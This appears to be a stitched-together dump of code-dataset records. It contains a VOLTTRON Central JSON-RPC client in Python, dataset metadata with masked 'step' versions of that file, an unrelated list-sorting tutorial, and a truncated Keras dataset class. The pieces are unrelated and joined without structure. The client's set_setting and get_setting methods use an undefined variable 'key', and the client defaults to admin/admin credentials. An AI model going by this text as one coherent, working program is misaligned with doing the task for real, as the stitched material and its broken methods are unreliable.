[
3,
6,
7,
9,
10
] |
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
# Copyright (c) 2017, Battelle Memorial Institute
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation
# are those of the authors and should not be interpreted as representing
# official policies, either expressed or implied, of the FreeBSD
# Project.
#
# This material was prepared as an account of work sponsored by an
# agency of the United States Government. Neither the United States
# Government nor the United States Department of Energy, nor Battelle,
# nor any of their employees, nor any jurisdiction or organization that
# has cooperated in the development of these materials, makes any
# warranty, express or implied, or assumes any legal liability or
# responsibility for the accuracy, completeness, or usefulness or any
# information, apparatus, product, software, or process disclosed, or
# represents that its use would not infringe privately owned rights.
#
# Reference herein to any specific commercial product, process, or
# service by trade name, trademark, manufacturer, or otherwise does not
# necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors
# expressed herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY
# operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
import requests
"""
This example exposes the VOLTTRON web API
through a Python class that does not depend
on VOLTTRON proper. A VOLTTRON Central Agent must
be running on the url passed to the constructor.
"""
class VolttronWebRPC(object):
def __init__(self, url, username='admin', password='admin'):
"""
:param url: Jsonrpc endpoint for posting data.
:param username:
:param password:
"""
self._url = url
self._username = username
self._password = password
self._auth_token = None
self._auth_token = self.get_auth_token()
def do_rpc(self, method, **params):
"""
Generic method to request data from Volttron Central
:param method: Method to call
:param params: Any method specific keyword arguments
"""
data = {
'jsonrpc': '2.0',
'method': method,
'params': params,
'authorization': self._auth_token,
'id': '1'
}
r = requests.post(self._url, json=data)
validate_response(r)
return r.json()['result']
def get_auth_token(self):
"""
Get an authorization token from Volttron Central,
automatically called when the object is created
"""
return self.do_rpc('get_authorization',
username=self._username,
password=self._password)
def register_instance(self, addr, name=None):
"""
Register a platform with Volttron Central
:param addr: Platform's discovery address that will be registered
"""
        return self.do_rpc('register_instance', discovery_address=addr,
display_name=name)
def list_platforms(self):
"""
Get a list of registered platforms from Volttron Central.
"""
return self.do_rpc('list_platforms')
def install_agent(self, platform_uuid, fileargs):
"""
Install an agent on a platform
:param platform_uuid: uuid of platform where agent will be installed
:param fileargs: arguments for installing the agent
"""
rpc = 'platforms.uuid.{}.install'.format(platform_uuid)
return self.do_rpc(rpc, files=[fileargs])
def list_agents(self, platform_uuid):
"""
List agents installed on a platform
"""
return self.do_rpc('platforms.uuid.' + platform_uuid + '.list_agents')
def unregister_platform(self, platform_uuid):
"""
Unregister a platform with Volttron Central
"""
return self.do_rpc('unregister_platform', platform_uuid=platform_uuid)
def store_agent_config(self, platform_uuid, agent_identity, config_name,
raw_contents, config_type="json"):
"""
        Add a file to an agent's config store
        :param platform_uuid: uuid of platform where agent is installed
:param agent_identity: VIP identity of agent that will own the config
:param config_name: name of the configuration file
:param raw_contents: file data
"""
params = dict(platform_uuid=platform_uuid,
agent_identity=agent_identity,
config_name=config_name,
raw_contents=raw_contents,
config_type=config_type)
return self.do_rpc("store_agent_config", **params)
def list_agent_configs(self, platform_uuid, agent_identity):
"""
List the configuration files stored for an agent.
:param platform_uuid: uuid of platform where agent is installed
:param agent_identity: VIP identity of agent that owns the configs
"""
params = dict(platform_uuid=platform_uuid,
agent_identity=agent_identity)
return self.do_rpc("list_agent_configs", **params)
def get_agent_config(self, platform_uuid, agent_identity, config_name,
raw=True):
"""
Get a config file from an agent's Configuration Store
:param platform_uuid: uuid of platform where agent is installed
:param agent_identity: VIP identity of agent that owns the config
:param config_name: name of the configuration file
"""
params = dict(platform_uuid=platform_uuid,
agent_identity=agent_identity,
config_name=config_name,
raw=raw)
return self.do_rpc("get_agent_config", **params)
def set_setting(self, setting, value):
"""
Assign a value to a setting in Volttron Central
:param setting: Name of the setting to set
:param value: Value to assign to setting
"""
return self.do_rpc("set_setting", key=key, value=value)
def get_setting(self, setting):
"""
Get the value of a setting in Volttron Central
:param setting: Name of the setting to get
"""
return self.do_rpc("get_setting", key=key)
def get_setting_keys(self):
"""
        Get a list of settings in Volttron Central
"""
return self.do_rpc("get_setting_keys")
def validate_response(response):
"""
Validate that the message is a json-rpc response.
:param response:
:return:
"""
assert response.ok
rpcdict = response.json()
assert rpcdict['jsonrpc'] == '2.0'
assert rpcdict['id']
assert 'error' in rpcdict.keys() or 'result' in rpcdict.keys()
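# Illustrative usage sketch (not part of the original module): the URL below is
# a hypothetical local jsonrpc endpoint; a VOLTTRON Central agent must actually
# be running there for these calls to succeed.
if __name__ == '__main__':
    vc = VolttronWebRPC('http://127.0.0.1:8080/jsonrpc')
    for platform in vc.list_platforms():
        print(platform)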
|
normal
|
{
"blob_id": "6fdfcbcfdf2b680a1fbdb74f77fd5d1a9f7eac0b",
"index": 6105,
"step-1": "<mask token>\n\n\nclass VolttronWebRPC(object):\n\n def __init__(self, url, username='admin', password='admin'):\n \"\"\"\n :param url: Jsonrpc endpoint for posting data.\n :param username:\n :param password:\n \"\"\"\n self._url = url\n self._username = username\n self._password = password\n self._auth_token = None\n self._auth_token = self.get_auth_token()\n\n def do_rpc(self, method, **params):\n \"\"\"\n Generic method to request data from Volttron Central\n\n :param method: Method to call\n :param params: Any method specific keyword arguments\n \"\"\"\n data = {'jsonrpc': '2.0', 'method': method, 'params': params,\n 'authorization': self._auth_token, 'id': '1'}\n r = requests.post(self._url, json=data)\n validate_response(r)\n return r.json()['result']\n <mask token>\n <mask token>\n\n def list_platforms(self):\n \"\"\"\n Get a list of registered platforms from Volttron Central.\n \"\"\"\n return self.do_rpc('list_platforms')\n\n def install_agent(self, platform_uuid, fileargs):\n \"\"\"\n Install an agent on a platform\n\n :param platform_uuid: uuid of platform where agent will be installed\n :param fileargs: arguments for installing the agent\n \"\"\"\n rpc = 'platforms.uuid.{}.install'.format(platform_uuid)\n return self.do_rpc(rpc, files=[fileargs])\n\n def list_agents(self, platform_uuid):\n \"\"\"\n List agents installed on a platform\n \"\"\"\n return self.do_rpc('platforms.uuid.' + platform_uuid + '.list_agents')\n\n def unregister_platform(self, platform_uuid):\n \"\"\"\n Unregister a platform with Volttron Central\n \"\"\"\n return self.do_rpc('unregister_platform', platform_uuid=platform_uuid)\n\n def store_agent_config(self, platform_uuid, agent_identity, config_name,\n raw_contents, config_type='json'):\n \"\"\"\n Add a file to the an agent's config store\n\n :param platform_uuid: uuid of platform where agent will is installed\n :param agent_identity: VIP identity of agent that will own the config\n :param config_name: name of the configuration file\n :param raw_contents: file data\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw_contents=\n raw_contents, config_type=config_type)\n return self.do_rpc('store_agent_config', **params)\n\n def list_agent_configs(self, platform_uuid, agent_identity):\n \"\"\"\n List the configuration files stored for an agent.\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the configs\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity)\n return self.do_rpc('list_agent_configs', **params)\n\n def get_agent_config(self, platform_uuid, agent_identity, config_name,\n raw=True):\n \"\"\"\n Get a config file from an agent's Configuration Store\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the config\n :param config_name: name of the configuration file\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw=raw)\n return self.do_rpc('get_agent_config', **params)\n <mask token>\n\n def get_setting(self, setting):\n \"\"\"\n Get the value of a setting in Volttron Central\n\n :param setting: Name of the setting to get\n \"\"\"\n return self.do_rpc('get_setting', key=key)\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass VolttronWebRPC(object):\n\n def __init__(self, url, username='admin', password='admin'):\n \"\"\"\n :param url: Jsonrpc endpoint for posting data.\n :param username:\n :param password:\n \"\"\"\n self._url = url\n self._username = username\n self._password = password\n self._auth_token = None\n self._auth_token = self.get_auth_token()\n\n def do_rpc(self, method, **params):\n \"\"\"\n Generic method to request data from Volttron Central\n\n :param method: Method to call\n :param params: Any method specific keyword arguments\n \"\"\"\n data = {'jsonrpc': '2.0', 'method': method, 'params': params,\n 'authorization': self._auth_token, 'id': '1'}\n r = requests.post(self._url, json=data)\n validate_response(r)\n return r.json()['result']\n <mask token>\n <mask token>\n\n def list_platforms(self):\n \"\"\"\n Get a list of registered platforms from Volttron Central.\n \"\"\"\n return self.do_rpc('list_platforms')\n\n def install_agent(self, platform_uuid, fileargs):\n \"\"\"\n Install an agent on a platform\n\n :param platform_uuid: uuid of platform where agent will be installed\n :param fileargs: arguments for installing the agent\n \"\"\"\n rpc = 'platforms.uuid.{}.install'.format(platform_uuid)\n return self.do_rpc(rpc, files=[fileargs])\n\n def list_agents(self, platform_uuid):\n \"\"\"\n List agents installed on a platform\n \"\"\"\n return self.do_rpc('platforms.uuid.' + platform_uuid + '.list_agents')\n\n def unregister_platform(self, platform_uuid):\n \"\"\"\n Unregister a platform with Volttron Central\n \"\"\"\n return self.do_rpc('unregister_platform', platform_uuid=platform_uuid)\n\n def store_agent_config(self, platform_uuid, agent_identity, config_name,\n raw_contents, config_type='json'):\n \"\"\"\n Add a file to the an agent's config store\n\n :param platform_uuid: uuid of platform where agent will is installed\n :param agent_identity: VIP identity of agent that will own the config\n :param config_name: name of the configuration file\n :param raw_contents: file data\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw_contents=\n raw_contents, config_type=config_type)\n return self.do_rpc('store_agent_config', **params)\n\n def list_agent_configs(self, platform_uuid, agent_identity):\n \"\"\"\n List the configuration files stored for an agent.\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the configs\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity)\n return self.do_rpc('list_agent_configs', **params)\n\n def get_agent_config(self, platform_uuid, agent_identity, config_name,\n raw=True):\n \"\"\"\n Get a config file from an agent's Configuration Store\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the config\n :param config_name: name of the configuration file\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw=raw)\n return self.do_rpc('get_agent_config', **params)\n <mask token>\n\n def get_setting(self, setting):\n \"\"\"\n Get the value of a setting in Volttron Central\n\n :param setting: Name of the setting to get\n \"\"\"\n return self.do_rpc('get_setting', key=key)\n\n def get_setting_keys(self):\n \"\"\"\n Get a list of settings in Volttorn Central\n \"\"\"\n return self.do_rpc('get_setting_keys')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass VolttronWebRPC(object):\n\n def __init__(self, url, username='admin', password='admin'):\n \"\"\"\n :param url: Jsonrpc endpoint for posting data.\n :param username:\n :param password:\n \"\"\"\n self._url = url\n self._username = username\n self._password = password\n self._auth_token = None\n self._auth_token = self.get_auth_token()\n\n def do_rpc(self, method, **params):\n \"\"\"\n Generic method to request data from Volttron Central\n\n :param method: Method to call\n :param params: Any method specific keyword arguments\n \"\"\"\n data = {'jsonrpc': '2.0', 'method': method, 'params': params,\n 'authorization': self._auth_token, 'id': '1'}\n r = requests.post(self._url, json=data)\n validate_response(r)\n return r.json()['result']\n\n def get_auth_token(self):\n \"\"\"\n Get an authorization token from Volttron Central,\n automatically called when the object is created\n \"\"\"\n return self.do_rpc('get_authorization', username=self._username,\n password=self._password)\n <mask token>\n\n def list_platforms(self):\n \"\"\"\n Get a list of registered platforms from Volttron Central.\n \"\"\"\n return self.do_rpc('list_platforms')\n\n def install_agent(self, platform_uuid, fileargs):\n \"\"\"\n Install an agent on a platform\n\n :param platform_uuid: uuid of platform where agent will be installed\n :param fileargs: arguments for installing the agent\n \"\"\"\n rpc = 'platforms.uuid.{}.install'.format(platform_uuid)\n return self.do_rpc(rpc, files=[fileargs])\n\n def list_agents(self, platform_uuid):\n \"\"\"\n List agents installed on a platform\n \"\"\"\n return self.do_rpc('platforms.uuid.' + platform_uuid + '.list_agents')\n\n def unregister_platform(self, platform_uuid):\n \"\"\"\n Unregister a platform with Volttron Central\n \"\"\"\n return self.do_rpc('unregister_platform', platform_uuid=platform_uuid)\n\n def store_agent_config(self, platform_uuid, agent_identity, config_name,\n raw_contents, config_type='json'):\n \"\"\"\n Add a file to the an agent's config store\n\n :param platform_uuid: uuid of platform where agent will is installed\n :param agent_identity: VIP identity of agent that will own the config\n :param config_name: name of the configuration file\n :param raw_contents: file data\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw_contents=\n raw_contents, config_type=config_type)\n return self.do_rpc('store_agent_config', **params)\n\n def list_agent_configs(self, platform_uuid, agent_identity):\n \"\"\"\n List the configuration files stored for an agent.\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the configs\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity)\n return self.do_rpc('list_agent_configs', **params)\n\n def get_agent_config(self, platform_uuid, agent_identity, config_name,\n raw=True):\n \"\"\"\n Get a config file from an agent's Configuration Store\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the config\n :param config_name: name of the configuration file\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw=raw)\n return self.do_rpc('get_agent_config', **params)\n\n def set_setting(self, setting, value):\n \"\"\"\n Assign a value to a setting in Volttron Central\n \n :param setting: Name of the 
setting to set\n :param value: Value to assign to setting\n \"\"\"\n return self.do_rpc('set_setting', key=key, value=value)\n\n def get_setting(self, setting):\n \"\"\"\n Get the value of a setting in Volttron Central\n\n :param setting: Name of the setting to get\n \"\"\"\n return self.do_rpc('get_setting', key=key)\n\n def get_setting_keys(self):\n \"\"\"\n Get a list of settings in Volttorn Central\n \"\"\"\n return self.do_rpc('get_setting_keys')\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass VolttronWebRPC(object):\n\n def __init__(self, url, username='admin', password='admin'):\n \"\"\"\n :param url: Jsonrpc endpoint for posting data.\n :param username:\n :param password:\n \"\"\"\n self._url = url\n self._username = username\n self._password = password\n self._auth_token = None\n self._auth_token = self.get_auth_token()\n\n def do_rpc(self, method, **params):\n \"\"\"\n Generic method to request data from Volttron Central\n\n :param method: Method to call\n :param params: Any method specific keyword arguments\n \"\"\"\n data = {'jsonrpc': '2.0', 'method': method, 'params': params,\n 'authorization': self._auth_token, 'id': '1'}\n r = requests.post(self._url, json=data)\n validate_response(r)\n return r.json()['result']\n\n def get_auth_token(self):\n \"\"\"\n Get an authorization token from Volttron Central,\n automatically called when the object is created\n \"\"\"\n return self.do_rpc('get_authorization', username=self._username,\n password=self._password)\n\n def register_instance(self, addr, name=None):\n \"\"\"\n Register a platform with Volttron Central\n\n :param addr: Platform's discovery address that will be registered\n \"\"\"\n return self.do_rpc('register_instance', discovery_address=addr,\n display_name=name)\n\n def list_platforms(self):\n \"\"\"\n Get a list of registered platforms from Volttron Central.\n \"\"\"\n return self.do_rpc('list_platforms')\n\n def install_agent(self, platform_uuid, fileargs):\n \"\"\"\n Install an agent on a platform\n\n :param platform_uuid: uuid of platform where agent will be installed\n :param fileargs: arguments for installing the agent\n \"\"\"\n rpc = 'platforms.uuid.{}.install'.format(platform_uuid)\n return self.do_rpc(rpc, files=[fileargs])\n\n def list_agents(self, platform_uuid):\n \"\"\"\n List agents installed on a platform\n \"\"\"\n return self.do_rpc('platforms.uuid.' 
+ platform_uuid + '.list_agents')\n\n def unregister_platform(self, platform_uuid):\n \"\"\"\n Unregister a platform with Volttron Central\n \"\"\"\n return self.do_rpc('unregister_platform', platform_uuid=platform_uuid)\n\n def store_agent_config(self, platform_uuid, agent_identity, config_name,\n raw_contents, config_type='json'):\n \"\"\"\n Add a file to the an agent's config store\n\n :param platform_uuid: uuid of platform where agent will is installed\n :param agent_identity: VIP identity of agent that will own the config\n :param config_name: name of the configuration file\n :param raw_contents: file data\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw_contents=\n raw_contents, config_type=config_type)\n return self.do_rpc('store_agent_config', **params)\n\n def list_agent_configs(self, platform_uuid, agent_identity):\n \"\"\"\n List the configuration files stored for an agent.\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the configs\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity)\n return self.do_rpc('list_agent_configs', **params)\n\n def get_agent_config(self, platform_uuid, agent_identity, config_name,\n raw=True):\n \"\"\"\n Get a config file from an agent's Configuration Store\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the config\n :param config_name: name of the configuration file\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw=raw)\n return self.do_rpc('get_agent_config', **params)\n\n def set_setting(self, setting, value):\n \"\"\"\n Assign a value to a setting in Volttron Central\n \n :param setting: Name of the setting to set\n :param value: Value to assign to setting\n \"\"\"\n return self.do_rpc('set_setting', key=key, value=value)\n\n def get_setting(self, setting):\n \"\"\"\n Get the value of a setting in Volttron Central\n\n :param setting: Name of the setting to get\n \"\"\"\n return self.do_rpc('get_setting', key=key)\n\n def get_setting_keys(self):\n \"\"\"\n Get a list of settings in Volttorn Central\n \"\"\"\n return self.do_rpc('get_setting_keys')\n\n\n<mask token>\n",
"step-5": "# -*- coding: utf-8 -*- {{{\n# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:\n\n# Copyright (c) 2017, Battelle Memorial Institute\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in\n# the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n# The views and conclusions contained in the software and documentation\n# are those of the authors and should not be interpreted as representing\n# official policies, either expressed or implied, of the FreeBSD\n# Project.\n#\n# This material was prepared as an account of work sponsored by an\n# agency of the United States Government. Neither the United States\n# Government nor the United States Department of Energy, nor Battelle,\n# nor any of their employees, nor any jurisdiction or organization that\n# has cooperated in the development of these materials, makes any\n# warranty, express or implied, or assumes any legal liability or\n# responsibility for the accuracy, completeness, or usefulness or any\n# information, apparatus, product, software, or process disclosed, or\n# represents that its use would not infringe privately owned rights.\n#\n# Reference herein to any specific commercial product, process, or\n# service by trade name, trademark, manufacturer, or otherwise does not\n# necessarily constitute or imply its endorsement, recommendation, or\n# favoring by the United States Government or any agency thereof, or\n# Battelle Memorial Institute. The views and opinions of authors\n# expressed herein do not necessarily state or reflect those of the\n# United States Government or any agency thereof.\n#\n# PACIFIC NORTHWEST NATIONAL LABORATORY\n# operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY\n# under Contract DE-AC05-76RL01830\n\n# }}}\n\nimport requests\n\n\"\"\"\nThis example exposes the VOLTTRON web API\nthrough a python class that that does not depend\non VOLTTRON proper. 
A VOLTTRON Central Agent must\nbe running on the url passed to the constructor.\n\"\"\"\n\nclass VolttronWebRPC(object):\n def __init__(self, url, username='admin', password='admin'):\n \"\"\"\n :param url: Jsonrpc endpoint for posting data.\n :param username:\n :param password:\n \"\"\"\n self._url = url\n self._username = username\n self._password = password\n\n self._auth_token = None\n self._auth_token = self.get_auth_token()\n\n def do_rpc(self, method, **params):\n \"\"\"\n Generic method to request data from Volttron Central\n\n :param method: Method to call\n :param params: Any method specific keyword arguments\n \"\"\"\n data = {\n 'jsonrpc': '2.0',\n 'method': method,\n 'params': params,\n 'authorization': self._auth_token,\n 'id': '1'\n }\n\n r = requests.post(self._url, json=data)\n validate_response(r)\n\n return r.json()['result']\n\n def get_auth_token(self):\n \"\"\"\n Get an authorization token from Volttron Central,\n automatically called when the object is created\n \"\"\"\n return self.do_rpc('get_authorization',\n username=self._username,\n password=self._password)\n\n def register_instance(self, addr, name=None):\n \"\"\"\n Register a platform with Volttron Central\n\n :param addr: Platform's discovery address that will be registered\n \"\"\"\n return self.do_rpc('register_instance',discovery_address=addr,\n display_name=name)\n\n def list_platforms(self):\n \"\"\"\n Get a list of registered platforms from Volttron Central.\n \"\"\"\n return self.do_rpc('list_platforms')\n\n def install_agent(self, platform_uuid, fileargs):\n \"\"\"\n Install an agent on a platform\n\n :param platform_uuid: uuid of platform where agent will be installed\n :param fileargs: arguments for installing the agent\n \"\"\"\n rpc = 'platforms.uuid.{}.install'.format(platform_uuid)\n return self.do_rpc(rpc, files=[fileargs])\n\n def list_agents(self, platform_uuid):\n \"\"\"\n List agents installed on a platform\n \"\"\"\n return self.do_rpc('platforms.uuid.' 
+ platform_uuid + '.list_agents')\n\n def unregister_platform(self, platform_uuid):\n \"\"\"\n Unregister a platform with Volttron Central\n \"\"\"\n return self.do_rpc('unregister_platform', platform_uuid=platform_uuid)\n\n def store_agent_config(self, platform_uuid, agent_identity, config_name,\n raw_contents, config_type=\"json\"):\n \"\"\"\n Add a file to the an agent's config store\n\n :param platform_uuid: uuid of platform where agent will is installed\n :param agent_identity: VIP identity of agent that will own the config\n :param config_name: name of the configuration file\n :param raw_contents: file data\n \"\"\"\n params = dict(platform_uuid=platform_uuid,\n agent_identity=agent_identity,\n config_name=config_name,\n raw_contents=raw_contents,\n config_type=config_type)\n return self.do_rpc(\"store_agent_config\", **params)\n\n def list_agent_configs(self, platform_uuid, agent_identity):\n \"\"\"\n List the configuration files stored for an agent.\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the configs\n \"\"\"\n params = dict(platform_uuid=platform_uuid,\n agent_identity=agent_identity)\n return self.do_rpc(\"list_agent_configs\", **params)\n\n def get_agent_config(self, platform_uuid, agent_identity, config_name,\n raw=True):\n \"\"\"\n Get a config file from an agent's Configuration Store\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the config\n :param config_name: name of the configuration file\n \"\"\"\n params = dict(platform_uuid=platform_uuid,\n agent_identity=agent_identity,\n config_name=config_name,\n raw=raw)\n return self.do_rpc(\"get_agent_config\", **params)\n\n def set_setting(self, setting, value):\n \"\"\"\n Assign a value to a setting in Volttron Central\n \n :param setting: Name of the setting to set\n :param value: Value to assign to setting\n \"\"\"\n return self.do_rpc(\"set_setting\", key=key, value=value)\n\n def get_setting(self, setting):\n \"\"\"\n Get the value of a setting in Volttron Central\n\n :param setting: Name of the setting to get\n \"\"\"\n return self.do_rpc(\"get_setting\", key=key)\n\n def get_setting_keys(self):\n \"\"\"\n Get a list of settings in Volttorn Central\n \"\"\"\n return self.do_rpc(\"get_setting_keys\")\n\n\ndef validate_response(response):\n \"\"\"\n Validate that the message is a json-rpc response.\n\n :param response:\n :return:\n \"\"\"\n assert response.ok\n rpcdict = response.json()\n assert rpcdict['jsonrpc'] == '2.0'\n assert rpcdict['id']\n assert 'error' in rpcdict.keys() or 'result' in rpcdict.keys()\n",
"step-ids": [
11,
12,
14,
15,
18
]
}
|
[
11,
12,
14,
15,
18
] |
#Sorting a list of numbers
#descending, then ascending
ls=[1,34,23,56,34,67,87,54,62,31,66]
ls.sort(reverse=True)
print(ls)
ls.sort()
print(ls)
#Sorting a list of strings in different ways
ls_l=["aaa","ertdf","ieurtff","fnjr","resdjx","jfh","r","fd"]
#1-sort according to string length from small length to bigger
ls_l.sort(key=len)
print(ls_l)
#you can always reverse
ls_l.sort(key=len,reverse=True)
print(ls_l)
#2-Sort by the first letter (alphabetical order)
def FirstLetter(string):
return string[0]
ls_l.sort(key=FirstLetter)
print(ls_l)
ls2=[[0,1,'f'],[4,2,'t'],[9,4,'afsd']]
#3-Sort nested lists by their element at index 2 (the string value)
def secondItem(ls):
return ls[2]
ls2.sort(key=secondItem)
print(ls2)
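#The same sorts can also be written with lambda expressions instead of named
#helper functions; this is just an equivalent, more compact variant.
ls_l.sort(key=lambda s: s[0])
ls2.sort(key=lambda row: row[2])
print(ls_l)
print(ls2)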
|
normal
|
{
"blob_id": "0e0e51904f05b41b4769b730c836568b8bb63869",
"index": 9564,
"step-1": "<mask token>\n\n\ndef secondItem(ls):\n return ls[2]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef FirstLetter(string):\n return string[0]\n\n\n<mask token>\n\n\ndef secondItem(ls):\n return ls[2]\n\n\n<mask token>\n",
"step-3": "<mask token>\nls.sort(reverse=True)\nprint(ls)\nls.sort()\nprint(ls)\n<mask token>\nls_l.sort(key=len)\nprint(ls_l)\nls_l.sort(key=len, reverse=True)\nprint(ls_l)\n\n\ndef FirstLetter(string):\n return string[0]\n\n\nls_l.sort(key=FirstLetter)\nprint(ls_l)\n<mask token>\n\n\ndef secondItem(ls):\n return ls[2]\n\n\nls2.sort(key=secondItem)\nprint(ls2)\n",
"step-4": "ls = [1, 34, 23, 56, 34, 67, 87, 54, 62, 31, 66]\nls.sort(reverse=True)\nprint(ls)\nls.sort()\nprint(ls)\nls_l = ['aaa', 'ertdf', 'ieurtff', 'fnjr', 'resdjx', 'jfh', 'r', 'fd']\nls_l.sort(key=len)\nprint(ls_l)\nls_l.sort(key=len, reverse=True)\nprint(ls_l)\n\n\ndef FirstLetter(string):\n return string[0]\n\n\nls_l.sort(key=FirstLetter)\nprint(ls_l)\nls2 = [[0, 1, 'f'], [4, 2, 't'], [9, 4, 'afsd']]\n\n\ndef secondItem(ls):\n return ls[2]\n\n\nls2.sort(key=secondItem)\nprint(ls2)\n",
"step-5": "#Sorting for a number list\n#ascending and descending\nls=[1,34,23,56,34,67,87,54,62,31,66]\nls.sort(reverse=True)\nprint(ls)\nls.sort()\nprint(ls)\n#Sorting a letter's list with different scenarios\nls_l=[\"aaa\",\"ertdf\",\"ieurtff\",\"fnjr\",\"resdjx\",\"jfh\",\"r\",\"fd\"]\n\n#1-sort according to string length from small length to bigger\nls_l.sort(key=len)\nprint(ls_l)\n\n#you can always reverse\nls_l.sort(key=len,reverse=True)\nprint(ls_l)\n\n#2-Sort with first alphabetical order\ndef FirstLetter(string):\n return string[0]\n\nls_l.sort(key=FirstLetter)\nprint(ls_l)\n\n\n\n\n\nls2=[[0,1,'f'],[4,2,'t'],[9,4,'afsd']]\ndef secondItem(ls):\n return ls[2]\nls2.sort(key=secondItem)\nprint(ls2)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from collections import defaultdict
from typing import Union, Iterable, Sized
import numpy as np
from cached_property import cached_property
from keras.utils import to_categorical
from keras.preprocessing.sequence import pad_sequences
from keras.preprocessing.text import Tokenizer, text_to_word_sequence
class SourceTargetMixin:
"""
Allows subscription with 'source' and 'target' keywords
"""
def __getitem__(self, item):
if item in ['source', 'target']:
return getattr(self, item)
raise TypeError('Subscription is available '
'only with "source" and "target" keywords')
class BaseDataset(SourceTargetMixin):
def __init__(self, source: Union[Iterable, Sized],
target: Union[Iterable, Sized],
shuffle: bool=True, seed: int=42):
self.source = source
self.target = target
